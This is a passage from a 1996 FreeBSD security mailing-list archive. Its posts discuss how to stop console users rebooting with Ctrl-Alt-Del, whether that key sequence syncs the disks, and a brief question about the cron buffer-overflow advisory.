Worker's Compensation Board of Queensland, Australia. From owner-freebsd-security Tue Dec 17 16:57:57 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id QAA05192 for security-outgoing; Tue, 17 Dec 1996 16:57:57 -0800 (PST) Received: from narcissus.ml.org (brosenga.st.pitzer.edu [134.173.120.201]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id QAA05186 for ; Tue, 17 Dec 1996 16:57:54 -0800 (PST) Received: (from ben@localhost) by narcissus.ml.org (8.7.5/8.7.3) id QAA04088; Tue, 17 Dec 1996 16:57:45 -0800 (PST) Date: Tue, 17 Dec 1996 16:57:45 -0800 (PST) From: Snob Art Genre To: Stephen Hocking cc: freebsd-security@freebsd.org Subject: Re: sendmail... In-Reply-To: <199612180030.AAA27711@netfl15a.devetir.qld.gov.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Wed, 18 Dec 1996, Stephen Hocking wrote: > > > > > Ben > > > > The views expressed above are not those of the Worker's Compensation > > Board of Queensland, Australia. > > > > > > Ben, how in Hades did you manage to grab my .sig? > > > Stephen > -- > The views expressed above are not those of the Worker's Compensation Board of > Queensland, Australia. > > > Oh -- heh, well, I figured it was true for me too, and kind of funny, so I used it. I probably should have asked you. If you mind, I'll stop using it. Ben The views expressed above are not those of the Worker's Compensation Board of Queensland, Australia. From owner-freebsd-security Wed Dec 18 09:08:30 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id JAA15882 for security-outgoing; Wed, 18 Dec 1996 09:08:30 -0800 (PST) Received: from saturn.yars.free.net (saturn.yars.free.net [193.233.48.78]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id JAA15815 for ; Wed, 18 Dec 1996 09:08:11 -0800 (PST) Received: by saturn.yars.free.net id UAA00404; (8.6.12/vak/1.9) Wed, 18 Dec 1996 20:07:59 +0300 Date: Wed, 18 Dec 1996 20:07:59 +0300 From: aiv@saturn.yars.free.net (Igor V. Alekseev) Message-Id: <199612181707.UAA00404@saturn.yars.free.net> To: freebsd-security@freebsd.org Subject: stopping users from rebooting with ctr-alt-del Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hello, What would you recomment to stop users (and anyone who happens to be near the computer) from rebooting it by hitting ctr-alt-del? TIA, Igor V. Alekseev From owner-freebsd-security Wed Dec 18 10:12:17 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id KAA19841 for security-outgoing; Wed, 18 Dec 1996 10:12:17 -0800 (PST) Received: from rocky.mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id KAA19835 for ; Wed, 18 Dec 1996 10:12:14 -0800 (PST) Received: (from nate@localhost) by rocky.mt.sri.com (8.7.5/8.7.3) id LAA15232; Wed, 18 Dec 1996 11:11:23 -0700 (MST) Date: Wed, 18 Dec 1996 11:11:23 -0700 (MST) Message-Id: <199612181811.LAA15232@rocky.mt.sri.com> From: Nate Williams To: aiv@saturn.yars.free.net (Igor V. Alekseev) Cc: freebsd-security@freebsd.org Subject: Re: stopping users from rebooting with ctr-alt-del In-Reply-To: <199612181707.UAA00404@saturn.yars.free.net> References: <199612181707.UAA00404@saturn.yars.free.net> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > What would you recomment to stop users > (and anyone who happens to be near the computer) > from rebooting it by hitting ctr-alt-del? Install a keymap that doesn't have the reboot function mapped to any key (this won't keep them from rebooting it during bootup), or modify the default keymap to remove the reboot function. Nate From owner-freebsd-security Wed Dec 18 11:05:32 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id LAA21973 for security-outgoing; Wed, 18 Dec 1996 11:05:32 -0800 (PST) Received: from nchp4601.nosc.mil (nchp4601.nosc.mil [198.253.27.23]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id LAA21967 for ; Wed, 18 Dec 1996 11:05:29 -0800 (PST) Received: by nchp4601.nosc.mil (1.37.109.20/16.2) id AA217465923; Wed, 18 Dec 1996 14:05:23 -0500 Date: Wed, 18 Dec 1996 14:05:23 -0500 (EST) From: Bryan Swann To: freebsd-security@freebsd.org Subject: Re: stopping users from rebooting with ctr-alt-del In-Reply-To: <199612181707.UAA00404@saturn.yars.free.net> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Wed, 18 Dec 1996, Igor V. Alekseev wrote: > > Hello, > > What would you recomment to stop users > (and anyone who happens to be near the computer) > from rebooting it by hitting ctr-alt-del? > Gunfire, lethal injection, and electrocution. In that order. From owner-freebsd-security Wed Dec 18 14:31:55 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA02253 for security-outgoing; Wed, 18 Dec 1996 14:31:55 -0800 (PST) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id OAA02235 for ; Wed, 18 Dec 1996 14:31:49 -0800 (PST) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id XAA08751 for ; Wed, 18 Dec 1996 23:31:38 +0100 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id XAA20822 for freebsd-security@freebsd.org; Wed, 18 Dec 1996 23:31:11 +0100 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.4/keltia-uucp-2.9) id XAA19287; Wed, 18 Dec 1996 23:24:54 +0100 (CET) Message-ID: Date: Wed, 18 Dec 1996 23:24:54 +0100 From: roberto@keltia.freenix.fr (Ollivier Robert) To: freebsd-security@freebsd.org Subject: Re: stopping users from rebooting with ctr-alt-del References: <199612181707.UAA00404@saturn.yars.free.net> X-Mailer: Mutt 0.54 Mime-Version: 1.0 X-Operating-System: FreeBSD 3.0-CURRENT ctm#2815 In-Reply-To: <199612181707.UAA00404@saturn.yars.free.net>; from Igor V. Alekseev on Dec 18, 1996 20:07:59 +0300 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk According to Igor V. Alekseev: > (and anyone who happens to be near the computer) > from rebooting it by hitting ctr-alt-del? For now, it means removing the "boot" entries in /usr/share/keymaps/whatever.kbd you're using. There was some talk to make it a sysctl(8) variable but nothing happened. -- Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 3.0-CURRENT #31: Tue Dec 3 23:52:58 CET 1996 From owner-freebsd-security Wed Dec 18 22:11:13 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id WAA02806 for security-outgoing; Wed, 18 Dec 1996 22:11:13 -0800 (PST) Received: from bitbucket.edmweb.com (bitbucket.edmweb.com [204.244.190.9]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id WAA02801 for ; Wed, 18 Dec 1996 22:11:10 -0800 (PST) Received: (from steve@localhost) by bitbucket.edmweb.com (8.6.12/8.6.12) id WAA03056; Wed, 18 Dec 1996 22:11:09 -0800 Date: Wed, 18 Dec 1996 22:11:05 -0800 (PST) From: Steve Reid To: FreeBSD Security List Subject: cron [FreeBSD-SA-96:20.stack-overflow] In-Reply-To: <199612172007.VAA03986@gvr.win.tue.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Topic: unauthorized access via buffer overruns > cron, crontab, ppp > Category: core > Module: cron, crontab, ppp What is the nature of the problem with cron? If a user doesn't have access to crontab files, can they somehow cause buffer overflows in the running process??? From owner-freebsd-security Thu Dec 19 00:12:34 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id AAA08025 for security-outgoing; Thu, 19 Dec 1996 00:12:34 -0800 (PST) Received: from gw-nl1.philips.com (gw-nl1.philips.com [192.68.44.33]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id AAA08019 for ; Thu, 19 Dec 1996 00:12:32 -0800 (PST) Received: (from nobody@localhost) by gw-nl1.philips.com (8.6.10/8.6.10-0.994n-08Nov95) id JAA17145; Thu, 19 Dec 1996 09:12:24 +0100 Received: from unknown(130.139.36.3) by gw-nl1.philips.com via smap (V1.3+ESMTP) with ESMTP id sma016984; Thu Dec 19 09:11:37 1996 Received: from bsd.lss.cp.philips.com (bsd.lss.cp.philips.com [130.144.199.33]) by smtprelay.nl.cis.philips.com (8.6.10/8.6.10-1.2.1m-961216) with SMTP id JAA23120; Thu, 19 Dec 1996 09:11:36 +0100 Received: by bsd.lss.cp.philips.com (8.8.3/1.63) id JAA27696; Thu, 19 Dec 1996 09:11:36 +0100 (MET) From: Guido.vanRooij@nl.cis.philips.com (Guido van Rooij) Message-Id: <199612190811.JAA27696@bsd.lss.cp.philips.com> Subject: Re: cron [FreeBSD-SA-96:20.stack-overflow] To: steve@edmweb.com (Steve Reid) Date: Thu, 19 Dec 1996 09:11:36 +0100 (MET) Cc: security@freebsd.org In-Reply-To: from Steve Reid at "Dec 18, 96 10:11:05 pm" X-Mailer: ELM [version 2.4ME+ PL22 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Steve Reid wrote: > > Topic: unauthorized access via buffer overruns > > cron, crontab, ppp > > Category: core > > Module: cron, crontab, ppp > > What is the nature of the problem with cron? If a user doesn't have > access to crontab files, can they somehow cause buffer overflows in the > running process??? > If a user is allowed to run crontab you are in trouble. See the exploits recently posted on various lists, among which this list and Bugtraq. -Guido From owner-freebsd-security Thu Dec 19 01:53:59 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id BAA13223 for security-outgoing; Thu, 19 Dec 1996 01:53:59 -0800 (PST) Received: from rhiannon.clari.net.au (dns1.clari.net.au [203.27.85.9]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id BAA13218 for ; Thu, 19 Dec 1996 01:53:55 -0800 (PST) Received: (from root@localhost) by rhiannon.clari.net.au (8.7.5/8.6.12) id VAA06675 for freebsd-security@freebsd.org; Thu, 19 Dec 1996 21:04:10 +1100 (EST) Date: Thu, 19 Dec 1996 21:04:10 +1100 (EST) From: Peter Hawkins Message-Id: <199612191004.VAA06675@rhiannon.clari.net.au> To: freebsd-security@freebsd.org Subject: subscribe Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk subscribe From owner-freebsd-security Fri Dec 20 03:53:15 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id DAA17365 for security-outgoing; Fri, 20 Dec 1996 03:53:15 -0800 (PST) Received: from pir.net (moek.pir.net [158.43.129.42]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id DAA17360 for ; Fri, 20 Dec 1996 03:53:13 -0800 (PST) Received: (from pir@localhost) by pir.net (8.8.4/6.6.6) id LAA03542 for freebsd-security@freebsd.org; Fri, 20 Dec 1996 11:54:07 GMT Date: Fri, 20 Dec 1996 11:54:07 GMT From: Peter Radcliffe Message-Id: <199612201154.LAA03542@pir.net> To: freebsd-security@freebsd.org Subject: Re: stopping users from rebooting with ctr-alt-del Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk roberto@keltia.freenix.fr (Ollivier Robert) > According to Igor V. Alekseev: > > (and anyone who happens to be near the computer) > > from rebooting it by hitting ctr-alt-del? > > For now, it means removing the "boot" entries in > /usr/share/keymaps/whatever.kbd you're using. There was some talk to make > it a sysctl(8) variable but nothing happened. Something I wondered if was the case (but it isn't) and IMO would be good is to not allow control-alt-delelte if your console/vttys are marked as 'insecure' ... Peter. From owner-freebsd-security Fri Dec 20 06:38:45 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id GAA22046 for security-outgoing; Fri, 20 Dec 1996 06:38:45 -0800 (PST) Received: from perky.gothic.net.au (root@perky.gothic.net.au [203.24.16.61]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id GAA22041 for ; Fri, 20 Dec 1996 06:38:29 -0800 (PST) Received: (from sean@localhost) by perky.gothic.net.au (8.8.3/8.6.12) id BAA03599; Sat, 21 Dec 1996 01:38:25 +1100 (EST) Date: Sat, 21 Dec 1996 01:38:24 +1100 (EST) From: Sean Winn To: freebsd-security@freebsd.org Subject: Re: stopping users from rebooting with ctr-alt-del In-Reply-To: <199612201154.LAA03542@pir.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Just a simple question concerning the use of Ctrl-Alt-Del; would it be possible to only make the reboot usable only if it was root logged into the currently visible vty? Not being that cluey on the internals of the FreeBSD console internals, it's more a curiosity question than anything. A definitive "yes/no/damned if I know" from those who *are* capable of answering would save a relative novice hacker from wasting time :) I can already see a nice simple problem, in that it would only work after login...if you need to shutdown because you can't login for some reason (exhausted swap space because of a nasty process?), then this makes things difficult...but it should help machines in public places around people who have too much curiosity. -- Sean Winn email: sean@gothic.net.au, sean@cynet.net.au All opinions valued at $0.02, and not subject to inflation. From owner-freebsd-security Fri Dec 20 07:06:03 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id HAA22676 for security-outgoing; Fri, 20 Dec 1996 07:06:03 -0800 (PST) Received: from postoffice.cso.uiuc.edu (postoffice.cso.uiuc.edu [128.174.5.11]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id HAA22671 for ; Fri, 20 Dec 1996 07:06:02 -0800 (PST) Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [128.174.83.167]) by postoffice.cso.uiuc.edu (8.6.12/8.6.12) with ESMTP id JAA97746; Fri, 20 Dec 1996 09:06:00 -0600 Received: by alecto.physics.uiuc.edu (940816.SGI.8.6.9/940406.SGI) id JAA23349; Fri, 20 Dec 1996 09:04:45 -0600 From: igor@alecto.physics.uiuc.edu (Igor Roshchin) Message-Id: <199612201504.JAA23349@alecto.physics.uiuc.edu> Subject: Re: stopping users from rebooting with ctr-alt-del To: sean@perky.gothic.net.au (Sean Winn) Date: Fri, 20 Dec 1996 09:04:45 -0600 (CST) Cc: freebsd-security@freebsd.org In-Reply-To: from "Sean Winn" at Dec 21, 96 01:38:24 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > I can already see a nice simple problem, in that it would only work after > login...if you need to shutdown because you can't login for some reason > (exhausted swap space because of a nasty process?), then this makes things > difficult...but it should help machines in public places around people who > have too much curiosity. > Why would you need use ctrl-alt-del to reboot the machine ? 1. it's not a shutdown (it doesn't resync, anyhow) 2. if you need to "reboot" it no matter what - use the power switch, or "reset" button if one is present. May be I am wrong, but I don't see bug difference [for Unix] between ctrl-alt-del and "reset" . In a public place I would also disable "reset" and "power" button (I've seen so many time how our HPs were rebooted by users) IgoR aka StR From owner-freebsd-security Fri Dec 20 07:22:58 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id HAA23113 for security-outgoing; Fri, 20 Dec 1996 07:22:58 -0800 (PST) Received: from narcissus.ml.org (brosenga.st.pitzer.edu [134.173.120.201]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id HAA23108 for ; Fri, 20 Dec 1996 07:22:55 -0800 (PST) Received: (from ben@localhost) by narcissus.ml.org (8.7.5/8.7.3) id HAA08795; Fri, 20 Dec 1996 07:22:54 -0800 (PST) Date: Fri, 20 Dec 1996 07:22:54 -0800 (PST) From: Snob Art Genre To: Igor Roshchin cc: Sean Winn , freebsd-security@FreeBSD.org Subject: Re: stopping users from rebooting with ctr-alt-del In-Reply-To: <199612201504.JAA23349@alecto.physics.uiuc.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Fri, 20 Dec 1996, Igor Roshchin wrote: > > > > I can already see a nice simple problem, in that it would only work after > > login...if you need to shutdown because you can't login for some reason > > (exhausted swap space because of a nasty process?), then this makes things > > difficult...but it should help machines in public places around people who > > have too much curiosity. > > > > Why would you need use ctrl-alt-del to reboot the machine ? > 1. it's not a shutdown (it doesn't resync, anyhow) I believe this is incorrect. > 2. if you need to "reboot" it no matter what - > use the power switch, or "reset" button if one is present. > May be I am wrong, but I don't see bug difference [for Unix] > between ctrl-alt-del and "reset" . I think ctrl-alt-del syncs buffers and otherwise shuts down the machine "nicely". I may be wrong. > In a public place I would also disable "reset" and "power" button > Yes . . . in general I think allowing people physical access to a machine is a big risk. Anyone with a screwdriver and five minutes can remove your hard drive, after all. > (I've seen so many time how our HPs were rebooted by users) > > > IgoR > aka StR > > Ben The views expressed above are not those of the Worker's Compensation Board of Queensland, Australia. From owner-freebsd-security Fri Dec 20 07:37:38 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id HAA23791 for security-outgoing; Fri, 20 Dec 1996 07:37:38 -0800 (PST) Received: from vulcan.mikom.csir.co.za (vulcan.mikom.csir.co.za [146.64.83.97]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id HAA23785 for ; Fri, 20 Dec 1996 07:37:30 -0800 (PST) Received: (from jtonsing@localhost) by vulcan.mikom.csir.co.za (8.7.5/8.6.12) id RAA18260; Fri, 20 Dec 1996 17:36:34 +0200 (SAT) From: Johann Tonsing Message-Id: <199612201536.RAA18260@vulcan.mikom.csir.co.za> Subject: Re: stopping users from rebooting with ctr-alt-del To: sean@perky.gothic.net.au (Sean Winn) Date: Fri, 20 Dec 1996 17:36:34 +0200 (SAT) Cc: freebsd-security@freebsd.org In-Reply-To: from "Sean Winn" at Dec 21, 96 01:38:24 am X-Mailer: ELM [version 2.4 PL24 ME8a] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Sean Winn wrote: > Just a simple question concerning the use of Ctrl-Alt-Del; would it be > possible to only make the reboot usable only if it was root logged into > the currently visible vty? Not being that cluey on the internals of the > FreeBSD console internals, it's more a curiosity question than anything. > A definitive "yes/no/damned if I know" from those who *are* capable of > answering would save a relative novice hacker from wasting time :) Well, I guess it is possible since we have full source of the OS. Whether it is desireable is another question. > I can already see a nice simple problem, in that it would only work after > login...if you need to shutdown because you can't login for some reason > (exhausted swap space because of a nasty process?), then this makes things > difficult...but it should help machines in public places around people who > have too much curiosity. I'd consider having the kernel prompt for the root password if the console is marked insecure. This probably means that the MD5 of the root password will have to be placed in the kernel somewhere during the boot process while the disk is still accessible. (The user might want to reboot when the disk is not accessible.) (Keeping the root password in the kernel as plaintext is not a good idea.) Regards JT -- jtonsing@mikom.csir.co.za PGP public key: ftp://skeleton.mikom.csir.co.za/pub/netsec.pgp/jtonsing.pub Send anonymous mail to jt-anon@zibbi.mikom.csir.co.za (no reply possible) From owner-freebsd-security Fri Dec 20 07:47:04 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id HAA24086 for security-outgoing; Fri, 20 Dec 1996 07:47:04 -0800 (PST) Received: from mail.id.net (mail.id.net [199.125.1.6]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id HAA24081 for ; Fri, 20 Dec 1996 07:47:02 -0800 (PST) Received: from server.id.net (server.id.net [199.125.0.10]) by mail.id.net (8.7.5/ID-Net) with ESMTP id KAA24465; Fri, 20 Dec 1996 10:48:49 -0500 (EST) Received: (from rls@localhost) by server.id.net (8.8.2/8.7.3) id KAA05651; Fri, 20 Dec 1996 10:49:04 -0500 (EST) From: Robert Shady Message-Id: <199612201549.KAA05651@server.id.net> Subject: Re: stopping users from rebooting with ctr-alt-del In-Reply-To: from Snob Art Genre at "Dec 20, 96 07:22:54 am" To: ben@narcissus.ml.org (Snob Art Genre) Date: Fri, 20 Dec 1996 10:49:04 -0500 (EST) Cc: igor@alecto.physics.uiuc.edu, sean@perky.gothic.net.au, freebsd-security@FreeBSD.org X-Mailer: ELM [version 2.4ME+ PL25 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk > > > I can already see a nice simple problem, in that it would only work after > > > login...if you need to shutdown because you can't login for some reason > > > (exhausted swap space because of a nasty process?), then this makes things > > > difficult...but it should help machines in public places around people who > > > have too much curiosity. > > > > > > > Why would you need use ctrl-alt-del to reboot the machine ? > > 1. it's not a shutdown (it doesn't resync, anyhow) > > I believe this is incorrect. This is incorrect. Most PC UNIX's trap the Ctrl-Alt-Del keystrokes and either run the standard "shutdown -r now", or call a sync, flush, and reboot. > > 2. if you need to "reboot" it no matter what - > > use the power switch, or "reset" button if one is present. > > May be I am wrong, but I don't see bug difference [for Unix] > > between ctrl-alt-del and "reset" . > > I think ctrl-alt-del syncs buffers and otherwise shuts down the machine > "nicely". I may be wrong. Yes, Ctrl-Alt-Del is a much safer way to reboot a PC based UNIX box than just flipping the power off.. > > In a public place I would also disable "reset" and "power" button > > > > Yes . . . in general I think allowing people physical access to a machine > is a big risk. Anyone with a screwdriver and five minutes can remove your > hard drive, after all. Granted. -- Rob === _/_/_/_/_/ _/_/_/_/ _/_/ _/ _/_/_/_/_/ _/_/_/_/_/ _/ _/ _/ _/_/_/ _/ _/ _/ _/_/_/_/ _/ _/_/_/_/_/ _/_/_/_/ _/ _/ _/_/_/_/_/ _/ Innovative Data Services Serving South-Eastern Michigan Internet Service Provider / Hardware Sales / Consulting Services Voice: (810)855-0404 / Fax: (810)855-3268 / Web: http://www.id.net From owner-freebsd-security Fri Dec 20 08:17:24 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id IAA25309 for security-outgoing; Fri, 20 Dec 1996 08:17:24 -0800 (PST) Received: from gw-nl1.philips.com (gw-nl1.philips.com [192.68.44.33]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id IAA25297 for ; Fri, 20 Dec 1996 08:17:20 -0800 (PST) Received: (from nobody@localhost) by gw-nl1.philips.com (8.6.10/8.6.10-0.994n-08Nov95) id RAA07946 for ; Fri, 20 Dec 1996 17:17:17 +0100 Received: from unknown(130.139.36.3) by gw-nl1.philips.com via smap (V1.3+ESMTP) with ESMTP id sma007727; Fri Dec 20 17:16:45 1996 Received: from giga.lss.cp.philips.com (giga.lss.cp.philips.com [130.144.199.31]) by smtprelay.nl.cis.philips.com (8.6.10/8.6.10-1.2.1m-961216) with SMTP id RAA02878 for ; Fri, 20 Dec 1996 17:16:43 +0100 Received: by giga.lss.cp.philips.com (8.8.4/1.63) id RAA07474; Fri, 20 Dec 1996 17:16:43 +0100 (MET) From: security@giga.lss.cp.philips.com (Walter Belgers for mailing lists) Message-Id: <199612201616.RAA07474@giga.lss.cp.philips.com> Subject: Re: stopping users from rebooting with ctr-alt-del To: freebsd-security@freebsd.org Date: Fri, 20 Dec 1996 17:16:42 +0100 (MET) In-Reply-To: from Snob Art Genre at "Dec 20, 96 07:22:54 am" X-Mailer: ELM [version 2.4ME+ PL19 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Snob Art Genre writes: > > > > > Why would you need use ctrl-alt-del to reboot the machine ? > > 1. it's not a shutdown (it doesn't resync, anyhow) > > I believe this is incorrect. Indeed it nicely syncs disks. > I think ctrl-alt-del syncs buffers and otherwise shuts down the machine > "nicely". I may be wrong. No, you're right. At a student society I set up a FreeBSD system and we found students hitting CTRL-ALT-DEL to get Windows (they didn't understand the login: prompt, sheesh) so we remapped reboot to CTRL-ALT-R. We wanted to keep the option in case the system was crashed to an extent that logging in was impossible but CTRL-ALT-R would still work. E.g. when we were still running 1.1.5.1 and switching virtual consoles when X was shutting down would nuke the screen. Walter. -- Ir. W.H.B. Belgers, Internet Security Specialist phone: +31 40 2782753 Origin IT Syst.Man. /Nederland bv, Bldg VN-513 email: fax: +31 40 2784697 P.O. Box 218, 5600 MD Eindhoven, Netherlands W.Belgers@nl.cis.philips.com http://www.cis.philips.com/home/W.Belgers http://www.IAEhv.nl/users/gigawalt From owner-freebsd-security Fri Dec 20 08:31:51 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id IAA26129 for security-outgoing; Fri, 20 Dec 1996 08:31:51 -0800 (PST) Received: from rocky.mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id IAA26124 for ; Fri, 20 Dec 1996 08:31:48 -0800 (PST) Received: (from nate@localhost) by rocky.mt.sri.com (8.7.5/8.7.3) id JAA23622; Fri, 20 Dec 1996 09:31:39 -0700 (MST) Date: Fri, 20 Dec 1996 09:31:39 -0700 (MST) Message-Id: <199612201631.JAA23622@rocky.mt.sri.com> From: Nate Williams To: igor@alecto.physics.uiuc.edu (Igor Roshchin) Cc: sean@perky.gothic.net.au (Sean Winn), freebsd-security@freebsd.org Subject: Re: stopping users from rebooting with ctr-alt-del In-Reply-To: <199612201504.JAA23349@alecto.physics.uiuc.edu> References: <199612201504.JAA23349@alecto.physics.uiuc.edu> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > I can already see a nice simple problem, in that it would only work after > > login...if you need to shutdown because you can't login for some reason > > (exhausted swap space because of a nasty process?), then this makes things > > difficult...but it should help machines in public places around people who > > have too much curiosity. > > > > Why would you need use ctrl-alt-del to reboot the machine ? > 1. it's not a shutdown (it doesn't resync, anyhow) Huh? If you mean it doesn't write the contents of the disk, then you're wrong. I added the code so that it does indeed do a clean shutdown. > 2. if you need to "reboot" it no matter what - > use the power switch, or "reset" button if one is present. > May be I am wrong, but I don't see bug difference [for Unix] > between ctrl-alt-del and "reset" . The difference between a clean shutdown and a hard shutdown. Nate From owner-freebsd-security Fri Dec 20 08:45:49 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id IAA26598 for security-outgoing; Fri, 20 Dec 1996 08:45:49 -0800 (PST) Received: from nic.follonett.no (nic.follonett.no [194.198.43.10]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id IAA26590 for ; Fri, 20 Dec 1996 08:45:36 -0800 (PST) Received: (from uucp@localhost) by nic.follonett.no (8.8.3/8.8.3) with UUCP id RAA21943; Fri, 20 Dec 1996 17:43:51 +0100 (MET) Received: from oo7 (oo7.dimaga.com [192.0.0.65]) by dimaga.com (8.7.5/8.7.2) with SMTP id RAA28722; Fri, 20 Dec 1996 17:45:14 +0100 (MET) Message-Id: <3.0.32.19961220174411.009b7e10@dimaga.com> X-Sender: eivind@dimaga.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Fri, 20 Dec 1996 17:44:12 +0100 To: Sean Winn From: Eivind Eklund Subject: Re: stopping users from rebooting with ctr-alt-del Cc: security@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk At 01:38 AM 12/21/96 +1100, you wrote: >I can already see a nice simple problem, in that it would only work after >login...if you need to shutdown because you can't login for some reason >(exhausted swap space because of a nasty process?), then this makes things >difficult...but it should help machines in public places around people who >have too much curiosity. A simple solution: In secure mode, make CTRL-ALT-DEL sync the disks, alert the user, and keep synced for a short amount of time (say 5 seconds). Allow three of these syncs, then set a limit of eg 5 minutes before somebody can do it again. This way the administrator can sync and then remove power or hard reset, but a nobody can't do "prank resets" - you get a maximum of 15s/300s = 5% non-disk time if somebody is standing there messing with the machine constantly. (Possibly these constants should be tweaked, but I doubt somebody will stand there for five minutes just to "lock the disk" again) Eivind Eklund / perhaps@yes.no / http://maybe.yes.no/perhaps/ From owner-freebsd-security Fri Dec 20 08:57:17 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id IAA27248 for security-outgoing; Fri, 20 Dec 1996 08:57:17 -0800 (PST) Received: from postoffice.cso.uiuc.edu (postoffice.cso.uiuc.edu [128.174.5.11]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id IAA27240 for ; Fri, 20 Dec 1996 08:57:14 -0800 (PST) Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [128.174.83.167]) by postoffice.cso.uiuc.edu (8.6.12/8.6.12) with ESMTP id KAA67506; Fri, 20 Dec 1996 10:56:40 -0600 Received: by alecto.physics.uiuc.edu (940816.SGI.8.6.9/940406.SGI) id KAA26853; Fri, 20 Dec 1996 10:55:22 -0600 From: igor@alecto.physics.uiuc.edu (Igor Roshchin) Message-Id: <199612201655.KAA26853@alecto.physics.uiuc.edu> Subject: Re: stopping users from rebooting with ctr-alt-del To: guido@gvr.win.tue.nl (Guido van Rooij) Date: Fri, 20 Dec 1996 10:55:21 -0600 (CST) Cc: ben@narcissus.ml.org, sean@perky.gothic.net.au, freebsd-security@FreeBSD.org In-Reply-To: <199612201629.RAA21703@gvr.win.tue.nl> from "Guido van Rooij" at Dec 20, 96 05:29:54 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@FreeBSD.org X-Loop: 